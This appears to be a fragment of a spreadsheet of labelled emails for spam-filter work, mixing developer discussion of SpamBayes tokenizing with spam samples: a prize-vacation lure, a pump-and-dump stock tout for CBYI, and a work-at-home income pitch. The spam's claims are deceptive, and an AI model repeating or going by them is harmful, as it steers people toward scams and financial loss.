 Robin Lynn Frank---Director of Operations---Paradigm, Omega, LLC
 http://paradigm-omega.com              http://paradigm-omega.net
  2002.  All rights reserved.  No duplication/dissemination permitted.
 Use of PGP/GPG encrypted mail preferred. No HTML/attachments accepted.
 Fingerprint:  08E0 567C 63CC 5642 DB6D  D490 0F98 D7D3 77EA 3714
 Key Server:  http://paradigm-omega.com/keymaster.html
 - ------------------------------------------------------------------------
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9bEcKD5jX03fqNxQRAmTfAKDM6BDsePbg8fb9Ore0XuS5jB4t1wCfbTcw
 /PBXqXO7Pei1f9lIj4gd0/c=
 =PNJx
 -----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;   TP&gt; I'm reading this now as that you trained on about 220 spam and
 &gt;   TP&gt; about 220 ham.  That's less than 10% of the sizes of the
 &gt;   TP&gt; training sets I've been using.  Please try an experiment: train
 &gt;   TP&gt; on 550 of each, and test once against the other 550 of each.
 [Jeremy]
 &gt; This helps a lot!
 Possibly.  I checked in a change to classifier.py overnight (getting rid of
 MINCOUNT) that gave a major improvement in the f-n rate too, independent of
 tokenization.
 &gt; Here are results with the stock tokenizer:
 Unsure what "stock tokenizer" means to you.  For example, it might mean
 tokenizer.tokenize, or mboxtest.MyTokenizer.tokenize.
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 8&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       0.000  10.413
 &gt;       1.398   6.104
 &gt;       1.398   5.027
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 0&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       0.000   8.259
 &gt;       1.242   2.873
 &gt;       1.242   5.745
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 3&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       1.398   5.206
 &gt;       1.398   4.488
 &gt;       0.000   9.336
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 0&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       1.553   5.206
 &gt;       1.553   5.027
 &gt;       0.000   9.874
 &gt; total false pos 139 5.39596273292
 &gt; total false neg 970 43.5368043088
 Note that those rates remain much higher than I got using just 220 of ham
 and 220 of spam.  That remains A Mystery.
 &gt; And results from the tokenizer that looks at all headers except Date,
 &gt; Received, and X-From_:
 Unsure what that means too.  For example, "looks at" might mean you enabled
 Anthony's count-them gimmick, and/or that you're tokenizing them yourself,
 and/or ...?
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 8&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       0.000   7.540
 &gt;       0.932   4.847
 &gt;       0.932   3.232
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 0&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       0.000   7.181
 &gt;       0.621   2.873
 &gt;       0.621   4.847
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 3&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       1.087   4.129
 &gt;       1.087   3.052
 &gt;       0.000   6.822
 &gt; Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox:
 &gt; /home/jeremy/Mail/spam 0&gt;
 &gt;  ... 644 hams &amp; 557 spams
 &gt;       0.776   3.411
 &gt;       0.776   3.411
 &gt;       0.000   6.463
 &gt; total false pos 97 3.76552795031
 &gt; total false neg 738 33.1238779174
 &gt;
 &gt; Is it safe to conclude that avoiding any cleverness with headers is a
 &gt; good thing?
 Since I don't know what you did, exactly, I can't guess.  What you seemed to
 show is that you did *something* clever with headers and that doing so
 helped (the "after" numbers are better than the "before" numbers, right?).
 Assuming that what you did was override what's now
 tokenizer.Tokenizer.tokenize_headers with some other routine, and didn't
 call the base Tokenizer.tokenize_headers at all, then you're missing
 carefully tested treatment of just a few header fields, but adding many
 dozens of other header fields.  There's no question that adding more header
 fields should help; tokenizer.Tokenizer.tokenize_headers doesn't do so only
 because my testing corpora are such that I can't add more headers without
 getting major benefits for bogus reasons.
 Apart from all that, you said you're skipping Received.  By several
 accounts, that may be the most valuable of all the header fields.  I'm
 (meaning tokenizer.Tokenizer.tokenize_headers) skipping them too for the
 reason explained above.  Offline a week or two ago, Neil Schemenauer
 reported good results from this scheme:
     ip_re = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')
     for header in msg.get_all("received", ()):
         for ip in ip_re.findall(header):
             parts = ip.split(".")
             for n in range(1, 5):
                 yield 'received:' + '.'.join(parts[:n])
 This makes a lot of sense to me; I just checked it in, but left it disabled
 for now.
</t>
  </si>
  <si>
    <t xml:space="preserve">Bitbitch writes:
 &gt; Listen.  If you pull numbers like that without a fact, the automagic
 &gt; assumption is yes, they were extracted out of your neither orifice.
 &gt; Point wasn't to conclude otherwise unless you had any relevant bits.
 &gt; Its not my job to do _your_ bit searching for you, but I figured I'd
 &gt; humor fork with this bit of finding:
 &gt; 
 &gt; http://www.thebody.com/bp/apr01/research_notebook.html  (Pointing ot
 &gt; averages of about 13 for every 3 months (for gay men), which totals to
 &gt; about  52 a year.  52 a year doesn't equal 3000.   Or even 300.
 Er, that study would seem to lend credence to Eugen's
 estimations, rather than casting fresh doubts. 
 52 a year *does* exceed 300, in under 6 years' time. The average
 age of that study's participants was *39* -- meaning some 
 participants may have had 20-25+ years of active sex life. 
 At that age, and further ** HIV+ **, it seems reasonable to
 think that some the participants may have actually slowed 
 their pace a bit. 
 So while this study's summary info is incomplete, you could 
 easily conclude that the *average* participant in this one study
 will have had over a thousand partners over a 40-50+ year active 
 sex life, and so the even-more-active tails of the distribution
 could easily be in the 3000+ range.
 Of course this says very little, almost nothing, about the overall 
 population behavior, gay or straight, and the relative prevalence
 of 3K+ individuals in either group. But it does strongly suggest 
 that gay males with 3K+ partners exist in measurable numbers, so
 people should stop treating Eugen's anecdotal estimation as if it
 were sheer fantasy. BitBitch's own citation suggests otherwise.
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Congratulations hpshum you've won! 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Pack Your Bags!&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#008080"&gt;
 &lt;div align="center"&gt;&lt;center&gt;
 &lt;table border="1" width="640" bgcolor="#FFFFFF" bordercolor="#000000" cellpadding="5"
 cellspacing="6"&gt;
   &lt;tr&gt;
     &lt;td width="100%" bgcolor="#FFFF00"&gt;&lt;table border="2" width="100%" bordercolor="#000000" cellspacing="6" cellpadding="5" bgcolor="#FFFFFF"&gt;
       &lt;tr&gt;
         &lt;td width="100%" bgcolor="#00FFFF"&gt;&lt;p align="center"&gt;&lt;font face="Verdana"&gt;&lt;em&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;marquee
         border="1" behavior="alternate" scrollamount="3" scrolldelay="30"&gt;Congratulations!&lt;/marquee&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/em&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;
 &lt;hr&gt;
 &lt;div align="center"&gt;&lt;center&gt;
 &lt;table border="1" width="640" cellspacing="6" cellpadding="5" bordercolor="#000000"
 bgcolor="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="100%" bgcolor="#78EBA0"&gt;&lt;table border="1" width="100%" bgcolor="#FF0000"
     cellspacing="5" cellpadding="5"&gt;
       &lt;tr&gt;
         &lt;td width="100%" bgcolor="#FFFFFF"&gt;&lt;p align="center"&gt;&lt;font face="Courier New"&gt;&lt;strong&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;Official
         Notification&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;p align="center"&gt;&lt;big&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;&lt;big&gt;&lt;font color="#FF0000"&gt;hpshum@hotmail.com&lt;/font&gt;&lt;/big&gt;&lt;br&gt;
     You have been specially selected to register for a&lt;br&gt;
     Florida/Bahamas vacation!&lt;/font&gt;&lt;/strong&gt;&lt;/big&gt;&lt;/p&gt;
     &lt;table border="0" width="100%" cellspacing="6" cellpadding="5"&gt;
       &lt;tr&gt;
         &lt;td width="25%"&gt;&lt;font face="Verdana" color="#000080"&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;td width="50%" bgcolor="#FFFFFF"&gt;&lt;table border="1" width="100%" bordercolor="#000000"
         cellspacing="0" cellpadding="2"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;font face="Arial"&gt;&lt;strong&gt;You &lt;em&gt;Will&lt;/em&gt; Enjoy:&lt;/strong&gt;&lt;/font&gt;&lt;ul&gt;
               &lt;li&gt;&lt;font face="Arial" color="#400040"&gt;&lt;strong&gt;8 days/ 7 Nights of 1st Class Accomodations&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
               &lt;li&gt;&lt;font face="Arial" color="#400040"&gt;&lt;strong&gt;Valid for up to 4 travelers&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
               &lt;li&gt;&lt;font face="Arial" color="#400040"&gt;&lt;strong&gt;Rental Car with&lt;br&gt;
 	unlimited mileage&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
               &lt;li&gt;&lt;font face="Arial" color="#400040"&gt;&lt;strong&gt;Adult Casino Cruise&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
               &lt;li&gt;&lt;font face="Arial" color="#400040"&gt;&lt;strong&gt;Great Florida Attractions!&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
               &lt;li&gt;&lt;font face="Arial" color="#400040"&gt;&lt;strong&gt;Much Much More...&lt;/strong&gt;&lt;/font&gt;&lt;/li&gt;
             &lt;/ul&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
         &lt;td width="25%"&gt;
                 &lt;p align="right"&gt;&lt;font face="Verdana" color="#000080"&gt;&lt;strong&gt;&lt;a href="http://www143.fastwebsnet.com"&gt;&lt;big&gt;Click Here!&lt;/big&gt;&lt;br&gt;
                   &lt;/a&gt;&lt;/strong&gt;&lt;a href="http://www143.fastwebsnet.com"&gt;&lt;small&gt;&lt;small&gt;&lt;small&gt;(limited Availability)&lt;/small&gt;&lt;/small&gt;&lt;/small&gt;&lt;/a&gt;&lt;/font&gt;
               &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;
 &lt;hr&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;small&gt;&lt;font face="Verdana"&gt;To no longer receive this or any other offer from us, &lt;a href="http://www143.fastwebsnet.com/remove.htm"&gt;click here&lt;/a&gt; to unsubscribe.&lt;/font&gt;&lt;/small&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Hmm, if the shoe fits... I think these five attributes could more or 
 less describe various actions of the US over the past decade or so...
 &gt; In the 1990s we witnessed the emergence of a small number of rogue 
 &gt; states that, while different in important ways, share a number of 
 &gt; attributes. These states:
 &gt;
 &gt; *    brutalize their own people and squander their national resources 
 &gt; for the personal gain of the rulers;
 The first part of this doesn't really fit, except in isolated cases - 
 certainly not en mass. The second part though... Hmm...
 &gt; *    display no regard for international law, threaten their 
 &gt; neighbors, and callously violate international treaties to which they 
 &gt; are party;
 Well, think about it.
 &gt; *    are determined to acquire weapons of mass destruction, along with 
 &gt; other advanced military technology, to be used as threats or 
 &gt; offensively to achieve the aggressive designs of these regimes; 
 We already have weapons of mass destruction, but are actively developing 
 bigger and better ones.
 &gt; *    sponsor terrorism around the globe; and
 Heheh... Anyone know about the 'School of the Americas'? What about the 
 monies, supplies, and training that supported the contra rebels? Oh, I 
 forgot, their government was "bad" and needed to be overthrown (with out 
 help).
 &gt; *    reject basic human values and hate the United States and 
 &gt; everything for which it stands.
 Basic human values like the first ammendment? The fourth ammendment?
 Sorry, Shrub, your political newspeak is falling on deaf ears. Oh, 
 sorry, maybe I should self-censor my thoughts to avoid being put in a 
 're-education camp' by Ashcrofts gestappo? Gads, maybe someone on FoRK 
 has joined your T.I.P.S. program and became an official citizen spy?
 In disgust,
 Elias
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW: SHORT TERM BUY RECOMMENDATION
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;META http-equiv=3D=22Content-Type=22 content=3D=22=
 text/html; charset=3Dwindows-1252=22&gt;&lt;STYLE&gt;A:link =7BTEX-DECORATION: none=7D=
 A:active =7BTEXT-DECORATION: none=7DA:visited =7BTEXT-DECORATION: none=7DA:h=
 over =7BCOLOR: =230033ff; TEXT-DECORATION: underline=7D&lt;/STYLE&gt;&lt;META conten=
 t=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgColor=
 =3D=22=23CCCC99=22&gt;&lt;TABLE borderColor=3D=22=23660000=22 cellSpacing=3D=220=22 cellP=
 adding=3D=220=22 border=3D=220=22 width=3D=22100%=22&gt;&lt;TR&gt;&lt;TD bgColor=3D=22=23CCCC99=22=
  valign=3D=22top=22 colspan=3D=222=22 height=3D=2227=22&gt;
 &lt;font size=3D=226=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660=
 000=22&gt;
 &lt;b&gt;OTC&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694f=22&gt;=
 &lt;font size=3D=225=22 face=3D=22Times New Roman, Times, serif=22 color=3D=22=23FF=
 FFFF=22&gt;
 &lt;b&gt;&amp;nbsp;Newsletter&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694=
 f=22&gt;&lt;div align=3D=22right=22&gt;&lt;font color=3D=22=23FFFFFF=22&gt;
 &lt;b&gt;Discover Tomorrow's Winners&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD =
 height=3D=2225=22 colspan=3D=222=22 bgcolor=3D=22=23CCCC99=22&gt;&lt;table width=3D=22100%=
 =22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=225=22&gt;&lt;tr&gt;&lt;td valign=3D=22=
 middle=22 height=3D=222=22&gt;&lt;table width=3D=22300=22 border=3D=221=22 cellspacing=3D=
 =220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22 bgcolor=3D=22=23EBEDCB=22=
  height=3D=225=22 align=3D=22center=22&gt;&lt;tr&gt;&lt;td valign=3D=22middle=22 height=3D=228=22=
 &gt;&lt;div align=3D=22center=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660000=22 size=3D=
 =225=22&gt;
 &lt;b&gt;For Immediate Release&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;table width=3D=22100%=22 border=3D=221=22 cellspacing=3D=220=22 cellpaddin=
 g=3D=228=22 align=3D=22center=22 bgcolor=3D=22=23fafaf5=22 bordercolor=3D=22=23660000=
 =22&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23fafaf5=22 valign=3D=22top=22 height=3D=22453=22&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;Cal-Bay (Stock Symbol: CBYI)&lt;/b&gt;
 &lt;br&gt;Watch for analyst =22Strong Buy Recommendations=22 and several adviso=
 ry newsletters picking CBYI.  CBYI has filed to be traded on the OTCBB, =
 share prices historically INCREASE when companies get listed on this lar=
 ger trading exchange. CBYI is trading around 25 cents and should skyrock=
 et to =242.66 - =243.25 a share in the near future.&lt;br&gt;
 &lt;b&gt;&lt;i&gt;Put CBYI on your watch list, acquire a position TODAY.&lt;/i&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;REASONS TO INVEST IN CBYI&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 A profitable company and is on track to beat ALL earnings estimates=21&lt;/=
 font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 One of the FASTEST growing distributors in environmental &amp;amp; safety e=
 quipment instruments.&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 color=3D=22=2300=
 0000=22 size=3D=22-1=22&gt;
 Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE cli=
 ent list including the U.S. Air Force, Anheuser-Busch, Chevron Refining =
 and Mitsubishi Heavy Industries, GE-Energy &amp;amp; Environmental Research.=
 &lt;/font&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;RAPIDLY GROWING INDUSTRY&lt;/b&gt;
 &lt;br&gt;Industry revenues exceed =24900 million, estimates indicate that the=
 re could be as much as =2425 billion from =22smell technology=22 by the end=
  of 2003.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;=21=21=21=21=21CONGRATULATIONS=21=21=21=21=21&lt;/b&gt;&lt;br&gt;Our last recommendation t=
 o buy ORBT at =241.29 rallied and is holding steady at =243.50=21 Congratul=
 ations to all our subscribers that took advantage of this recommendation=
 .&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D=22center=22&gt;&lt;font size=3D=22-1=22 face=3D=22Verdana, Arial, Helveti=
 ca, sans-serif=22 color=3D=22=23660000=22&gt;
 ALL removes HONORED. Please allow 7 days to be removed and send ALL add=
 resses to:
 &lt;font color=3D=23ff0000&gt;
 &lt;a href=3D=22mailto:goneforgood=40btamail.net.cn=22&gt;GoneForGood=40btamail.ne=
 t.cn
 &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D=22100%=22 border=3D=221=22 c=
 ellspacing=3D=220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D=22=23660000=22 height=3D=228=22&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23=
 FFFFCC=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=220=22 cellpad=
 ding=3D=224=22&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size=3D=22-2=22 face=3D=22Verdana, Arial, Helvetica, sans-serif=22&gt;
 Certain statements contained in this news release may be forward-lookin=
 g statements within the meaning of The Private Securities Litigation Ref=
 orm Act of 1995. These statements may be identified by such terms as =22e=
 xpect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or similar terms=
 . We are NOT a registered investment advisor or a broker dealer. This is=
  NOT an offer to buy or sell securities. No recommendation that the secu=
 rities of the companies profiled should be purchased, sold or held by in=
 dividuals or entities that learn of the profiled companies. We were paid=
  =2427,000 in cash by a third party to publish this report. Investing in =
 companies profiled is high-risk and use of this information is for readi=
 ng purposes only. If anyone decides to act as an investor, then it will =
 be that investor's sole risk. Investors are advised NOT to invest withou=
 t the proper advisement from an attorney or a registered financial broke=
 r. Do not rely solely on the information presented, do additional indepe=
 ndent research to form your own opinion and decision regarding investing=
  in the profiled companies. Be advised that the purchase of such high-ri=
 sk securities may result in the loss of your entire investment.  Not int=
 ended for recipients or residents of CA,CO,CT,DE,ID, IL,IA,LA,MO,NV,NC,O=
 K,OH,PA,RI,TN,VA,WA,WV,WI. Void where prohibited.  The owners of this pu=
 blication may already own free trading shares in CBYI and may immediatel=
 y sell all or a portion of these shares into the open market at or about=
  the time this report is published.  Factual statements are made as of t=
 he date stated and are subject to change without notice.
 &lt;br&gt;Copyright c 2001&lt;/font&gt;&lt;hr width=3D=22100%=22 noShade size=3D=221=22&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD cols=
 pan=3D=222=22 height=3D=2231=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspaci=
 ng=3D=220=22 cellpadding=3D=224=22&gt;&lt;tr&gt;&lt;td width=3D=2287%=22 height=3D=2221=22&gt;&lt;div =
 align=3D=22right=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;td width=3D=227%=22 he=
 ight=3D=2221=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=226=22 color=3D=22=23FFF=
 FFF=22&gt;
 OTC&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;td width=3D=226%=22 height=3D=2221=22&gt;&lt;div align=3D=22le=
 ft=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/=
 TR&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ****
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Work at Home and Make GREAT MONEY!!!32286
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: =
 #ffffff" SIZE=3D2 PTSIZE=3D10&gt;&lt;B&gt;                     &lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PT=
 SIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;FOLLOW ME TO FINA=
 NCIAL FREEDOM!!&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"B=
 ACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D=
 "Arial" LANG=3D"0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt; &lt;BR&gt;
              I'm looking for people with good work ethic &lt;BR&gt;
              and extrordinary desire to earn at least &lt;BR&gt;
  &lt;BR&gt;
             &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BACK=
 GROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"A=
 rial" LANG=3D"0"&gt;&lt;B&gt;$10,000 per month&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D=
 "#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D=
 "SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt; working from home!&lt;BR&gt;
  &lt;BR&gt;
             &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACK=
 GROUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"A=
 rial" LANG=3D"0"&gt;&lt;B&gt;NO SPECIAL SKILLS OR EXPERIENCE REQUIRED&lt;/FONT&gt;&lt;FONT  =
 COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZ=
 E=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;&lt;BR&gt;
             We give you the training and personal support &lt;BR&gt;
             you need to ensure your success!&lt;BR&gt;
  &lt;BR&gt;
            This LEGITIMATE HOME-BASED INCOME OPPORTUNITY &lt;BR&gt;
            can put you back in control of your time, your finances, and yo=
 ur life!&lt;BR&gt;
  &lt;BR&gt;
            If you've tried other opportunities in the past &lt;BR&gt;
            that have failed to live up their promises, &lt;BR&gt;
           &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGR=
 OUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Ari=
 al" LANG=3D"0"&gt;&lt;B&gt;THIS IS DIFFERENT THEN ANYTHING ELSE YOU'VE SEEN!&lt;/FONT&gt;=
 &lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffff=
 ff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/=
 B&gt;&lt;BR&gt;
  &lt;BR&gt;
           THIS IS NOT A GET RICH QUICK SCHEME!&lt;BR&gt;
  &lt;BR&gt;
           &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGR=
 OUND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Ari=
 al" LANG=3D"0"&gt;YOUR FINANCIAL PAST DOES NOT &lt;BR&gt;
           HAVE TO BE YOUR FINANCIAL FUTURE!&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt; &lt;BR&gt;
           CALL ONLY IF YOU ARE SERIOUS! &lt;BR&gt;
 &lt;BR&gt;
        &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGROUN=
 D-COLOR: #ffffff" SIZE=3D5 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial"=
  LANG=3D"0"&gt;&lt;B&gt;1-800-753-7690   (Free, 2 minute message)&lt;/FONT&gt;&lt;FONT  COLO=
 R=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;&lt;BR&gt;
  &lt;BR&gt;
          DO NOT RESPOND BY EMAIL AND &lt;BR&gt;
          DON'T GO TO SLEEP WITHOUT LISTENING TO THIS!&lt;BR&gt;
  &lt;BR&gt;
         &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROU=
 ND-COLOR: #ffffff" SIZE=3D2 PTSIZE=3D10 FAMILY=3D"SANSSERIF" FACE=3D"Arial=
 " LANG=3D"0"&gt;" The moment you commit and quit holding back, all sorts &lt;BR&gt;
         of unforseen incidents, meetings and material assistance &lt;BR&gt;
         will rise up to help you. The simple act of commitment &lt;BR&gt;
         is a powerful magnet for help." - Napoleon Hill&lt;BR&gt;
 &lt;BR&gt;
        &lt;A HREF=3D"mailto:remove1634@removefactory.com"&gt;CLICK HERE TO BE RE=
